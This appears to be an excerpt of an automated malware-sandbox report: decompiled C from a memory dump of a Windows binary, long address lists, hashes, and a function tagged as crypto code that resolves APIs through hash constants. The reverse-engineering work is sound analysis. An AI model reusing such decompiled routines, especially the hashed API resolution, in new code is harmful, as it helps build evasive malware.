																	_v76 = _t614;
																	_v64 = _t673;
																	_t697 = _v68;
																	while(1) {
																		_t404 = _t404 + 1;
																		_t616 =  *((char*)(_t697 + _t404 * 2 - 1));
																		 *((char*)(_t546 + _t404 * 2 - 1)) = _t616;
																		if(_t616 == 0) {
																			break;
																		}
																		_t617 =  *((char*)(_t697 + _t404 * 2));
																		 *((char*)(_t546 + _t404 * 2)) = _t617;
																		if(_t617 != 0) {
																			continue;
																		}
																		break;
																	}
																	_t693 = _v56;
																	_t614 = _v76;
																	_t673 = _v64;
																}
															}
															_push(1);
															_push(_v68);
															_v80 = _t546;
															_v76 = _t614;
															E004110B0();
															_t614 = _v76;
															_t546 = _v80;
															_t723 = _t723 + 8;
														}
														 *(_t693 + 4) = _v72;
														 *_t693 = _t546;
													} else {
														_t546 = 0;
													}
													if(_t546 != 0) {
														_v64 = _t673;
														_v56 = _t693;
														_t696 = 0;
														_t678 = _v60;
														while(1) {
															_t696 = _t696 + 1;
															_t400 =  *((char*)(_t696 + _t614 - 1));
															 *((char*)(_t696 + _t546 - 1)) = _t400;
															if(_t678 != 0 && _t696 == _t678) {
																break;
															}
															if(_t400 != 0) {
																continue;
															} else {
																_t693 = _v56;
																_t673 = _v64;
															}
															goto L251;
														}
														_t693 = _v56;
														_t673 = _v64;
														 *((char*)(_t696 + _t546)) = 0;
													}
												}
											}
											L251:
											_t612 = _v40;
											 *( *((intOrPtr*)(_t612 + 4)) + _t508 - 4) = _t693;
										} while (_t673 <  *_t612);
										_t505 = _t612;
										_t371 = _v52;
										goto L253;
									}
								} else {
									L198:
									_v52 = 0;
									_v44 = 0;
									_t604 = _v48;
								}
							}
						}
					}
					_push(4);
					_push(_t604);
					E004110B0();
					_v48 = 0;
					return _t505;
				}
				L301:
			}

0x00423ec9
0x00423ecc
0x00423ece
0x00423ed1
0x00424b36
0x00423ed7
0x00423ed7
0x00424c80
0x00424c8c
0x00424c90
0x00000000
0x00424c92
0x00000000
0x00424c92
0x00423edd
0x00423edf
0x00423ee3
0x00423ee7
0x00423eeb
0x00423ef3
0x00423ef7
0x00423efd
0x00423f03
0x00423f0b
0x00423f0f
0x00423f13
0x00423f17
0x00424c77
0x00424c79
0x00423f1d
0x00423f1f
0x00423f22
0x00423f3a
0x00423f3e
0x00423f4a
0x00423f4f
0x00423f4f
0x00423f54
0x00423f58
0x00423f5e
0x00000000
0x00000000
0x00423f64
0x00423f69
0x00000000
0x00423f6b
0x00423f70
0x00423f84
0x00423f84
0x00000000
0x00423f72
0x00423f72
0x00423f7c
0x00423f82
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00423f82
0x00000000
0x00423f72
0x00423f70
0x00000000
0x00423f69
0x00424c70
0x00424c73
0x00000000
0x00423f24
0x00423f26
0x00423f28
0x00423f2b
0x00423f35
0x00423f38
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00423f38
0x00424c61
0x00424c63
0x00423f89
0x00423f89
0x00423f8e
0x00423f90
0x00423f99
0x00423f99
0x00423f9e
0x00000000
0x00000000
0x00423fa9
0x00000000
0x00000000
0x00000000
0x00423fa9
0x00424c53
0x00424c56
0x00000000
0x00424c5c
0x00000000
0x00424c5c
0x00000000
0x00424c56
0x00424c69
0x00424c69
0x00424c69
0x00424c63
0x00423f22
0x00423fab
0x00423fad
0x00423fae
0x00423fb2
0x00423fb8
0x00423fc0
0x00423fc1
0x00423fc5
0x00423fca
0x00423fce
0x00423fd2
0x00423fd6
0x00423fe0
0x00423fe3
0x00423fe3
0x00423fe8
0x00000000
0x00000000
0x00423ff3
0x00000000
0x00000000
0x00000000
0x00423ff3
0x00424c36
0x00424c37
0x00424c38
0x00424c3d
0x00000000
0x00424c43
0x00000000
0x00424c43
0x00000000
0x00424c3d
0x00423ff5
0x00423ff5
0x00423ff9
0x00423ff9
0x00423fff
0x0042417f
0x0042417f
0x00424186
0x00424188
0x0042418b
0x00424005
0x00424007
0x00424c2f
0x0042400d
0x0042400f
0x00424012
0x00424026
0x0042402a
0x00424036
0x0042403b
0x0042403b
0x00424040
0x00424044
0x0042404a
0x00000000
0x00000000
0x00424050
0x00424055
0x00000000
0x00424057
0x0042405c
0x0042406c
0x0042406c
0x00000000
0x0042405e
0x00424064
0x0042406a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042406a
0x0042405e
0x0042405c
0x00000000
0x00424055
0x00424c25
0x00424c28
0x00424014
0x00424016
0x00424018
0x0042401b
0x00424021
0x00424024
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00424024
0x0042401b
0x00424012
0x00424071
0x00424075
0x0042407a
0x0042407d
0x00424081
0x00424087
0x00424087
0x0042408d
0x00000000
0x0042409d
0x0042409f
0x004240a1
0x004240a6
0x004240a9
0x004240bd
0x004240c1
0x004240cd
0x004240d3
0x004240d3
0x004240d8
0x004240dc
0x004240e2
0x00000000
0x00000000
0x004240e8
0x004240ed
0x00000000
0x004240ef
0x004240f5
0x00424106
0x00424106
0x00000000
0x004240f7
0x004240fd
0x00424104
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00424104
0x004240f7
0x004240f5
0x00000000
0x004240ed
0x00424b40
0x00424b43
0x004240ab
0x004240ad
0x004240af
0x004240b2
0x004240b8
0x004240bb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004240bb
0x004240b2
0x004240a9
0x0042410b
0x00424110
0x00424116
0x0042411b
0x0042412b
0x0042412e
0x00424134
0x0042413c
0x0042413c
0x00424149
0x0042414a
0x00424157
0x00424159
0x0042415c
0x0042415e
0x00424160
0x00424163
0x00424163
0x00424164
0x00424169
0x0042416f
0x00000000
0x00000000
0x0042417b
0x00000000
0x00000000
0x0042417d
0x00000000
0x0042417b
0x00424b37
0x0042411d
0x0042411d
0x0042411d
0x0042411b
0x0042408d
0x0042418e
0x00424192
0x00424199
0x0042419d
0x004241a1
0x004241a9
0x00424311
0x00424313
0x00424313
0x0042431a
0x0042431c
0x00424323
0x00424327
0x0042432a
0x0042432e
0x0042437a
0x00424330
0x00424335
0x00424337
0x0042433b
0x0042433e
0x00424342
0x00424344
0x00424347
0x00424349
0x0042434b
0x0042434b
0x0042434c
0x00424351
0x00424357
0x00000000
0x00000000
0x00424359
0x0042435d
0x00424362
0x00000000
0x00000000
0x00000000
0x00424362
0x00424364
0x00424364
0x00424367
0x00424367
0x00424369
0x0042436b
0x0042436c
0x00424371
0x00424371
0x00424381
0x00424383
0x00424383
0x004241b8
0x004241ba
0x004241bd
0x004241d5
0x004241d9
0x004241e5
0x004241eb
0x004241eb
0x004241f0
0x004241f4
0x004241fa
0x00000000
0x00000000
0x00424200
0x00424205
0x00000000
0x00424207
0x0042420d
0x00424222
0x00424222
0x0042420f
0x0042420f
0x00424219
0x00424220
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00424220
0x00000000
0x0042420f
0x0042420d
0x00000000
0x00424205
0x00424b6c
0x00424b6f
0x00000000
0x004241bf
0x004241c1
0x004241c3
0x004241c6
0x004241d0
0x004241d3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004241d3
0x00424b53
0x00424b56
0x00424b64
0x00424b64
0x00424b56
0x00424227
0x0042422c
0x00424232
0x00424238
0x0042424e
0x00424252
0x00424258
0x00424260
0x00424260
0x0042426e
0x00424271
0x00424275
0x0042427b
0x0042427d
0x00424280
0x00424284
0x004242d5
0x00424286
0x00424288
0x0042428a
0x0042428d
0x00424291
0x00424295
0x00424299
0x0042429c
0x0042429e
0x0042429e
0x0042429f
0x004242a4
0x004242aa
0x00000000
0x00000000
0x004242ac
0x004242b0
0x004242b5
0x00000000
0x00000000
0x00000000
0x004242b5
0x004242b7
0x004242bb
0x004242bb
0x004242be
0x004242be
0x004242c0
0x004242c2
0x004242c3
0x004242c7
0x004242cc
0x004242d0
0x004242d0
0x004242dc
0x004242df
0x0042423a
0x0042423a
0x0042423a
0x004242e3
0x004242f1
0x004242f3
0x004242f3
0x004242f4
0x004242f9
0x004242ff
0x00000000
0x00000000
0x0042430b
0x00000000
0x00000000
0x0042430d
0x00000000
0x0042430b
0x00424b4a
0x00424b4a
0x004242e3
0x004241a9
0x0042438a
0x0042438a
0x0042438c
0x0042438d
0x00424392
0x00424395
0x00424399
0x0042439b
0x004243a5
0x004243a7
0x004243a9
0x004243b1
0x004243b7
0x00424c04
0x00424c18
0x00424c18
0x00424c1c
0x00424c06
0x00424c06
0x00424c06
0x00424c0a
0x00424c0e
0x00424c10
0x00000000
0x00424c10
0x004243bd
0x004243bd
0x004243bf
0x004243c7
0x004243c9
0x004243cd
0x004243d1
0x004243d5
0x004243dd
0x004243e1
0x004243e9
0x004243ec
0x00424404
0x00424408
0x00424414
0x00424418
0x0042441e
0x0042441e
0x00424423
0x00424427
0x0042442d
0x00000000
0x00000000
0x00424433
0x00424438
0x00000000
0x0042443a
0x0042443a
0x00424444
0x00000000
0x00424446
0x00424446
0x00424450
0x00424457
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00424457
0x00000000
0x00424446
0x00424444
0x00000000
0x00424438
0x00424be6
0x00424be8
0x00424beb
0x00424bef
0x00000000
0x004243ee
0x004243f0
0x004243f2
0x004243f5
0x004243ff
0x00424402
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00424402
0x00424bf1
0x00424bf3
0x00424459
0x00424459
0x00424461
0x00424466
0x00424469
0x0042446d
0x00424473
0x00424478
0x00424483
0x00424489
0x00424498
0x0042449d
0x0042449f
0x004244a3
0x004244a8
0x004244ab
0x004244af
0x004244af
0x004244b3
0x004244b7
0x004244cd
0x004244d2
0x004244d2
0x004244d5
0x004244dc
0x004244de
0x004244e3
0x004246f5
0x004244e9
0x004244eb
0x004244ed
0x004244f2
0x00424685
0x0042468c
0x00424690
0x00424693
0x00424697
0x004246e3
0x00424699
0x0042469e
0x004246a0
0x004246a4
0x004246a7
0x004246ab
0x004246ad
0x004246b1
0x004246b3
0x004246b5
0x004246b5
0x004246b6
0x004246bb
0x004246c1
0x00000000
0x00000000
0x004246c3
0x004246c7
0x004246cc
0x00000000
0x00000000
0x00000000
0x004246cc
0x004246ce
0x004246ce
0x004246ab
0x004246d2
0x004246d4
0x004246d5
0x004246da
0x004246da
0x004246ea
0x004246ec
0x00424501
0x00424503
0x00424506
0x00424528
0x0042452c
0x00424538
0x0042453e
0x00424542
0x00424544
0x00424544
0x00424549
0x0042454d
0x00424553
0x00000000
0x00000000
0x00424559
0x0042455e
0x00000000
0x00424560
0x00424560
0x0042456c
0x00424582
0x00424582
0x0042456e
0x0042456e
0x00424570
0x0042457a
0x00424580
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00424580
0x00424b84
0x00424b84
0x0042456c
0x00000000
0x0042455e
0x00424b8d
0x00424b92
0x00424508
0x00424508
0x00424512
0x00424516
0x00424519
0x00424523
0x00424526
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00424526
0x00424b9b
0x00424b9b
0x0042458a
0x00424593
0x00424599
0x0042459e
0x004245b7
0x004245ba
0x004245be
0x004245c4
0x004245cc
0x004245cc
0x004245d8
0x004245db
0x004245df
0x004245e0
0x004245e5
0x004245e9
0x004245ec
0x004245f0
0x0042463c
0x004245f2
0x004245f7
0x004245f9
0x004245fb
0x004245fe
0x00424602
0x00424604
0x00424607
0x00424609
0x0042460d
0x0042460f
0x0042460f
0x00424610
0x00424615
0x0042461b
0x00000000
0x00000000
0x0042461d
0x00424621
0x00424626
0x00000000
0x00000000
0x00000000
0x00424626
0x00424628
0x0042462b
0x0042462b
0x00424602
0x0042462f
0x00424631
0x00424632
0x00424637
0x00424637
0x00424647
0x0042464a
0x004245a0
0x004245a0
0x004245a0
0x00424651
0x00424657
0x0042465b
0x0042465d
0x00424661
0x00424665
0x00424665
0x00424666
0x0042466b
0x00424671
0x00000000
0x00000000
0x0042467d
0x00000000
0x0042467f
0x0042467f
0x0042467f
0x00000000
0x0042467d
0x00424b77
0x00424b7b
0x00424b7b
0x00424651
0x004244f2
0x004246f7
0x00424703
0x0042470c
0x0042470d
0x00424711
0x00000000
0x00424bf9
0x00424bf3
0x004243ec
0x00424713
0x00424713
0x0042471d
0x00424721
0x00424725
0x0042472a
0x00424a96
0x00424a98
0x00424a9c
0x00424aa0
0x00424aa6
0x00424aaa
0x00424aac
0x00424bd2
0x00424ab2
0x00424ab4
0x00424ab8
0x00424aba
0x00424abc
0x00424abc
0x00424ac1
0x00424ac3
0x00424ac5
0x00424aca
0x00424aca
0x00424ace
0x00424ad4
0x00424ad6
0x00424ad8
0x00424add
0x00424add
0x00424ae1
0x00424ae2
0x00424ae6
0x00424ae8
0x00424aea
0x00424aee
0x00424aee
0x00424aee
0x00424af2
0x00424af7
0x00424af9
0x00424aff
0x00424b01
0x00424b03
0x00424b08
0x00424b08
0x00424aff
0x00424af7
0x00424730
0x00424730
0x00424736
0x00424738
0x0042473d
0x0042479a
0x0042479a
0x0042473f
0x00424741
0x00424744
0x00424746
0x00424bdc
0x0042474c
0x0042474c
0x00424750
0x00424752
0x00424754
0x00424754
0x00424759
0x0042475b
0x0042475d
0x00424762
0x00424762
0x00424765
0x0042476b
0x0042476d
0x0042476f
0x00424774
0x00424774
0x00424777
0x00424778
0x0042477c
0x00424780
0x00424780
0x00424780
0x00424784
0x00424789
0x0042478b
0x00424791
0x00424793
0x00424795
0x00000000
0x00424795
0x00424791
0x00424789
0x0042479d
0x0042479f
0x004247a0
0x004247a5
0x004247a8
0x004247ac
0x004247b5
0x004247d6
0x004247e0
0x004247e4
0x004247e7
0x004247ec
0x004247ef
0x004247f3
0x004247f6
0x004247fa
0x00000000
0x004247fc
0x004247fc
0x00424800
0x00424802
0x00424806
0x00424806
0x00424808
0x0042480e
0x00424810
0x00424815
0x00424a74
0x00424a76
0x0042481b
0x0042481d
0x0042481e
0x00424826
0x00424828
0x00424831
0x00424835
0x0042483c
0x0042483c
0x00424842
0x00424844
0x00424847
0x0042484b
0x00424a04
0x00424a06
0x00424a0b
0x00424a0f
0x00424a12
0x00424a16
0x00424a63
0x00424a18
0x00424a1c
0x00424a1e
0x00424a20
0x00424a23
0x00424a27
0x00424a29
0x00424a2d
0x00424a2f
0x00424a33
0x00424a35
0x00424a35
0x00424a36
0x00424a3b
0x00424a41
0x00000000
0x00000000
0x00424a43
0x00424a47
0x00424a4c
0x00000000
0x00000000
0x00000000
0x00424a4c
0x00424a4e
0x00424a52
0x00424a52
0x00424a27
0x00424a56
0x00424a58
0x00424a59
0x00424a5e
0x00424a5e
0x00424a69
0x00424a6b
0x0042485a
0x0042485c
0x0042485f
0x00424881
0x00424885
0x00424891
0x00424896
0x0042489a
0x0042489e
0x004248a0
0x004248a0
0x004248a5
0x004248a9
0x004248af
0x00000000
0x00000000
0x004248b5
0x004248ba
0x00000000
0x004248bc
0x004248bc
0x004248c0
0x004248cc
0x004248e4
0x004248e4
0x004248ce
0x004248ce
0x004248d2
0x004248dc
0x004248e2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004248e2
0x00000000
0x004248d2
0x004248cc
0x00000000
0x004248ba
0x00424bc0
0x00424bc5
0x00424bc9
0x00424861
0x00424861
0x0042486b
0x0042486f
0x00424872
0x0042487c
0x0042487f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042487f
0x00424bb7
0x00424bb7
0x00424bb7
0x004248ec
0x004248fb
0x00424900
0x00424913
0x00424916
0x0042491a
0x0042491f
0x00424927
0x00424927
0x00424934
0x00424937
0x0042493b
0x0042493c
0x00424940
0x00424945
0x00424949
0x0042494b
0x0042494e
0x00424950
0x00424956
0x004249bc
0x00424958
0x0042495a
0x0042495c
0x0042495f
0x00424963
0x00424965
0x00424969
0x0042496b
0x0042496f
0x00424973
0x00424977
0x00424977
0x00424978
0x0042497d
0x00424983
0x00000000
0x00000000
0x00424985
0x00424989
0x0042498e
0x00000000
0x00000000
0x00000000
0x0042498e
0x00424990
0x00424994
0x00424998
0x00424998
0x00424963
0x0042499c
0x0042499e
0x004249a2
0x004249a6
0x004249aa
0x004249af
0x004249b3
0x004249b7
0x004249b7
0x004249c3
0x004249c6
0x00424902
0x00424902
0x00424902
0x004249ca
0x004249d2
0x004249d6
0x004249da
0x004249dc
0x004249e0
0x004249e0
0x004249e1
0x004249e6
0x004249ec
0x00000000
0x00000000
0x004249f8
0x00000000
0x004249fa
0x004249fa
0x004249fe
0x004249fe
0x00000000
0x004249f8
0x00424ba6
0x00424baa
0x00424bae
0x00424bae
0x004249ca
0x0042484b
0x00424a7d
0x00424a7d
0x00424a84
0x00424a88
0x00424a90
0x00424a92
0x00000000
0x00424a92
0x004247b7
0x004247b7
0x004247b9
0x004247bd
0x004247c1
0x004247c1
0x004247b5
0x0042472a
0x004243b7
0x00424b0c
0x00424b0e
0x00424b0f
0x00424b17
0x00424b2a
0x00424b2a
0x00000000

Strings

, xrefs: 00423EF7

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3688684798
Opcode ID: 3777db9fb7302fe78b86c6571038d9905fa1a0678c18bd10d7013dee06b9c39e
Instruction ID: e717cac04fe4f905318696f4157aaf421712d717c237dcb9cc1452e8a4d2608f
Opcode Fuzzy Hash: 3777db9fb7302fe78b86c6571038d9905fa1a0678c18bd10d7013dee06b9c39e
Instruction Fuzzy Hash: F892F8707083628FD715CF29A48032BBBE1EFC5314F58866EE8959B391D738D981C79A

Uniqueness

Uniqueness Score: -1.00%

Function 004262F0, Relevance: 2.2, Strings: 1, Instructions: 961
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E004262F0(intOrPtr* __ecx, signed int __edx, void* __eflags, char _a4) {
				intOrPtr* _v24;
				char _v32;
				intOrPtr _v36;
				unsigned int _v40;
				signed int _v44;
				signed int _v52;
				char _v56;
				unsigned int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _t264;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				void* _t272;
				char _t278;
				char _t279;
				char* _t281;
				signed int _t282;
				char _t283;
				void* _t287;
				char _t290;
				char _t291;
				char* _t293;
				signed int _t294;
				char _t295;
				signed int _t304;
				intOrPtr* _t306;
				intOrPtr* _t308;
				signed int _t310;
				signed int _t311;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				char* _t320;
				char* _t321;
				unsigned int _t322;
				unsigned int _t327;
				signed int _t329;
				signed int _t330;
				signed int _t332;
				signed int _t333;
				signed int _t336;
				signed int _t338;
				signed int _t339;
				signed int _t342;
				char* _t343;
				char* _t344;
				signed int _t346;
				signed int _t348;
				signed int _t349;
				signed int _t352;
				char* _t353;
				char* _t357;
				signed int _t359;
				signed int _t361;
				signed int _t362;
				signed int _t365;
				unsigned int _t375;
				signed int _t377;
				signed int _t381;
				signed int _t387;
				signed int _t389;
				signed int _t390;
				signed int _t395;
				signed int _t407;
				signed int _t417;
				char* _t418;
				char _t420;
				signed int _t421;
				void* _t431;
				char _t432;
				char _t434;
				char _t435;
				char* _t436;
				char _t438;
				char* _t439;
				char _t440;
				signed int _t441;
				void* _t451;
				char _t452;
				char _t454;
				char _t455;
				char* _t456;
				char _t458;
				char _t460;
				char _t461;
				signed int _t463;
				signed int _t465;
				void* _t469;
				char _t471;
				char _t472;
				signed int _t476;
				void* _t478;
				char _t480;
				char _t481;
				void* _t482;
				char _t484;
				char _t485;
				char _t489;
				char _t490;
				char _t491;
				char _t492;
				char _t493;
				char _t494;
				signed int _t497;
				char* _t499;
				void* _t505;
				unsigned int _t506;
				void* _t512;
				char* _t514;
				void* _t520;
				void* _t521;
				void* _t522;
				void* _t523;
				signed int _t524;
				void* _t531;
				void* _t537;
				void* _t543;
				signed int _t544;
				signed int _t548;
				void* _t551;
				void* _t552;
				void* _t553;

				_t306 = __ecx;
				_push(0x40);
				_t496 = __edx;
				 *__ecx = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				_t514 = E00411030();
				_t551 = (_t548 & 0xfffffff0) - 0x34 + 4;
				_t320 =  *__ecx;
				if(_t320 == 0) {
					 *_t514 = 0;
				} else {
					if(_t514 != 0) {
						_t492 =  *_t320;
						 *_t514 = _t492;
						if(_t492 != 0) {
							_v68 = __edx;
							_t304 = 0;
							while(1) {
								_t304 = _t304 + 1;
								_t493 =  *((char*)(_t320 + _t304 * 2 - 1));
								 *((char*)(_t514 + _t304 * 2 - 1)) = _t493;
								if(_t493 == 0) {
									break;
								}
								_t494 =  *((char*)(_t320 + _t304 * 2));
								 *((char*)(_t514 + _t304 * 2)) = _t494;
								if(_t494 != 0) {
									continue;
								}
								break;
							}
							_t496 = _v68;
						}
					}
					_push(1);
					_push(_t320);
					E004110B0();
					_t551 = _t551 + 8;
				}
				_v44 = 0;
				_push(0x40);
				 *_t306 = _t514;
				 *((intOrPtr*)(_t306 + 4)) = 0x40;
				_t264 = E00411030();
				_t552 = _t551 + 4;
				_t321 = _v44;
				if(_t321 == 0) {
					 *_t264 = 0;
					_v40 = 0x40;
					_v44 = _t264;
					goto L18;
				} else {
					if(_t264 == 0) {
						_push(1);
						_push(_t321);
						E004110B0();
						_t552 = _t552 + 8;
						_v40 = 0x40;
						_t520 = 0;
						_v44 = 0;
						goto L29;
					} else {
						_t489 =  *_t321;
						 *_t264 = _t489;
						if(_t489 != 0) {
							_v40 = 0;
							_t544 = 0;
							_v68 = _t496;
							while(1) {
								_t544 = _t544 + 1;
								_t490 =  *((char*)(_t321 + _t544 * 2 - 1));
								 *((char*)(_t264 + _t544 * 2 - 1)) = _t490;
								if(_t490 == 0) {
									break;
								}
								_t491 =  *((char*)(_t321 + _t544 * 2));
								 *((char*)(_t264 + _t544 * 2)) = _t491;
								if(_t491 != 0) {
									continue;
								}
								break;
							}
							_t496 = _v68;
						}
						_push(1);
						_push(_t321);
						_v64 = _t264;
						E004110B0();
						_t264 = _v64;
						_t552 = _t552 + 8;
						_v40 = 0x40;
						_v44 = _t264;
						L18:
						_t387 = _t264 & 0x0000000f;
						if(_t387 == 0) {
							L22:
							asm("pxor xmm0, xmm0");
							_t520 =  ~( ~_t387 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							while(1) {
								asm("movdqu xmm1, [eax+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb ecx, xmm1");
								if(_t321 != 0) {
									break;
								}
								_t387 = _t387 + 0x10;
								if(_t387 < _t520) {
									continue;
								} else {
									if(_t520 >= 0x7fffffff) {
										L28:
										_t520 = 0x7fffffff;
										goto L29;
									} else {
										while( *((char*)(_t520 + _t264)) != 0) {
											_t520 = _t520 + 1;
											if(_t520 < 0x7fffffff) {
												continue;
											} else {
												goto L28;
											}
											goto L30;
										}
										goto L250;
									}
								}
								goto L30;
							}
							asm("bsf esi, ecx");
							_t520 = _t520 + _t387;
							goto L250;
						} else {
							_t520 = 0;
							_t387 =  ~_t387 + 0x10;
							while( *((char*)(_t520 + _t264)) != 0) {
								_t520 = _t520 + 1;
								if(_t520 < _t387) {
									continue;
								} else {
									goto L22;
								}
								goto L30;
							}
							L250:
							if(_t520 != 0xfffffffe || _t264 == 0) {
								L29:
								_t322 = 0x40;
							} else {
								 *_t264 = 0;
								_t322 = _v40;
							}
							goto L30;
							L124:
							 *((char*)(_t269 + _t523)) = 0x64;
							_t417 = _v44;
							 *((char*)(_t523 + _t417 + 1)) = 0;
							if(_a4 == 0) {
								_v32 = _t496;
								_t497 = _v44;
								_v36 = _t497;
								_push(0x200);
								_t524 = E00411030();
								_t553 = _t552 + 4;
								_v24 = _t306;
								_t272 = E004115C0(0x588ab3ea, 0x8a156a0e);
								if(_t272 == 0) {
									_t308 = _v24;
									if(_t524 == 0 ||  *_t524 == 0) {
										_t418 =  *_t308;
										if(_t418 != 0) {
											 *_t418 = 0;
										}
										if( *((intOrPtr*)(_t308 + 4)) < 0x40) {
											_push(0x40);
											_t499 = E00411030();
											_t553 = _t553 + 4;
											_t344 =  *_t308;
											if(_t344 == 0) {
												 *_t499 = 0;
											} else {
												if(_t499 != 0) {
													_t420 =  *_t344;
													 *_t499 = _t420;
													if(_t420 != 0) {
														_v24 = _t308;
														_t421 = 0;
														while(1) {
															_t421 = _t421 + 1;
															_t278 =  *((char*)(_t344 + _t421 * 2 - 1));
															 *((char*)(_t499 + _t421 * 2 - 1)) = _t278;
															if(_t278 == 0) {
																break;
															}
															_t279 =  *((char*)(_t344 + _t421 * 2));
															 *((char*)(_t499 + _t421 * 2)) = _t279;
															if(_t279 != 0) {
																continue;
															}
															break;
														}
														_t308 = _v24;
													}
												}
												_push(1);
												_push(_t344);
												E004110B0();
												_t553 = _t553 + 8;
											}
											goto L225;
										}
									} else {
										_t346 = _t524 & 0x0000000f;
										if(_t346 == 0) {
											L184:
											asm("pxor xmm0, xmm0");
											_t505 =  ~( ~_t346 + 0x0000000f & 0x0000000f) + 0x7fffffff;
											while(1) {
												asm("movdqu xmm1, [esi+ecx]");
												asm("pcmpeqb xmm1, xmm0");
												asm("pmovmskb edx, xmm1");
												if(_t417 != 0) {
													break;
												}
												_t346 = _t346 + 0x10;
												if(_t346 < _t505) {
													continue;
												} else {
													if(_t505 >= 0x7fffffff) {
														L190:
														_t505 = 0x7fffffff;
													} else {
														while( *((char*)(_t505 + _t524)) != 0) {
															_t505 = _t505 + 1;
															if(_t505 < 0x7fffffff) {
																continue;
															} else {
																goto L190;
															}
															goto L191;
														}
														goto L234;
													}
												}
												goto L191;
											}
											asm("bsf edi, edx");
											_t505 = _t505 + _t346;
											goto L234;
										} else {
											_t505 = 0;
											_t346 =  ~_t346 + 0x10;
											while( *((char*)(_t505 + _t524)) != 0) {
												_t505 = _t505 + 1;
												if(_t505 < _t346) {
													continue;
												} else {
													goto L184;
												}
												goto L191;
											}
											L234:
											if(_t505 == 0xffffffff) {
												_t436 =  *_t308;
												if(_t436 != 0) {
													 *_t436 = 0;
												}
											}
										}
										L191:
										_t216 = _t505 + 1; // 0x80000000
										_t348 =  <=  ? 0x40 : _t216;
										if(_t348 >  *((intOrPtr*)(_t308 + 4))) {
											_v64 = (_t348 >> 5 >> 0x1a) + _t348 >> 6;
											_t349 = _t348 & 0x8000003f;
											if(_t349 < 0) {
												_t349 = (_t349 - 0x00000001 | 0xffffffc0) + 1;
											}
											_t352 = _v64 + (0 | _t349 > 0x00000000) << 6;
											_v64 = _t352;
											_push(_t352);
											_t353 = E00411030();
											_t553 = _t553 + 4;
											_t281 =  *_t308;
											if(_t281 == 0) {
												 *_t353 = 0;
											} else {
												if(_t353 != 0) {
													_t432 =  *_t281;
													 *_t353 = _t432;
													if(_t432 != 0) {
														_v68 = _t524;
														_v24 = _t308;
														_t311 = 0;
														while(1) {
															_t311 = _t311 + 1;
															_t434 =  *((char*)(_t281 + _t311 * 2 - 1));
															 *((char*)(_t353 + _t311 * 2 - 1)) = _t434;
															if(_t434 == 0) {
																break;
															}
															_t435 =  *((char*)(_t281 + _t311 * 2));
															 *((char*)(_t353 + _t311 * 2)) = _t435;
															if(_t435 != 0) {
																continue;
															}
															break;
														}
														_t524 = _v68;
														_t308 = _v24;
													}
												}
												_push(1);
												_push(_t281);
												_v68 = _t353;
												E004110B0();
												_t353 = _v68;
												_t553 = _t553 + 8;
											}
											 *((intOrPtr*)(_t308 + 4)) = _v64;
											 *_t308 = _t353;
										} else {
											_t353 =  *_t308;
										}
										_t282 = _t524;
										if(_t353 != 0 && _t524 != 0) {
											_v24 = _t308;
											_t431 = 0;
											_t310 = _t282;
											while(1) {
												_t283 =  *_t310;
												_t431 = _t431 + 1;
												 *_t353 = _t283;
												if(_t505 != 0 && _t431 == _t505) {
													goto L228;
												}
												if(_t283 == 0) {
													goto L229;
												} else {
													_t353 = _t353 + 1;
													_t310 = _t310 + 1;
													continue;
												}
												goto L226;
											}
											goto L228;
										}
									}
									goto L226;
								} else {
									_push( &_v32);
									_push(_t497);
									_push(0x200);
									_push(_t524);
									asm("int3");
									return _t272;
								}
							} else {
								_v52 = _t496;
								_t438 = _a4;
								_t506 = _v44;
								_v56 = _t438;
								_v60 = _t506;
								_push(0x200);
								_t524 = E00411030();
								_t553 = _t552 + 4;
								_v24 = _t306;
								_t287 = E004115C0(0x588ab3ea, 0x8a156a0e);
								if(_t287 == 0) {
									_t308 = _v24;
									if(_t524 == 0 ||  *_t524 == 0) {
										_t439 =  *_t308;
										if(_t439 != 0) {
											 *_t439 = 0;
										}
										if( *((intOrPtr*)(_t308 + 4)) < 0x40) {
											_push(0x40);
											_t499 = E00411030();
											_t553 = _t553 + 4;
											_t357 =  *_t308;
											if(_t357 == 0) {
												 *_t499 = 0;
											} else {
												if(_t499 != 0) {
													_t440 =  *_t357;
													 *_t499 = _t440;
													if(_t440 != 0) {
														_v24 = _t308;
														_t441 = 0;
														while(1) {
															_t441 = _t441 + 1;
															_t290 =  *((char*)(_t357 + _t441 * 2 - 1));
															 *((char*)(_t499 + _t441 * 2 - 1)) = _t290;
															if(_t290 == 0) {
																break;
															}
															_t291 =  *((char*)(_t357 + _t441 * 2));
															 *((char*)(_t499 + _t441 * 2)) = _t291;
															if(_t291 != 0) {
																continue;
															}
															break;
														}
														_t308 = _v24;
													}
												}
												_push(1);
												_push(_t357);
												E004110B0();
												_t553 = _t553 + 8;
											}
											L225:
											 *_t308 = _t499;
											 *((intOrPtr*)(_t308 + 4)) = 0x40;
										}
									} else {
										_t359 = _t524 & 0x0000000f;
										if(_t359 == 0) {
											L134:
											asm("pxor xmm0, xmm0");
											_t512 =  ~( ~_t359 + 0x0000000f & 0x0000000f) + 0x7fffffff;
											while(1) {
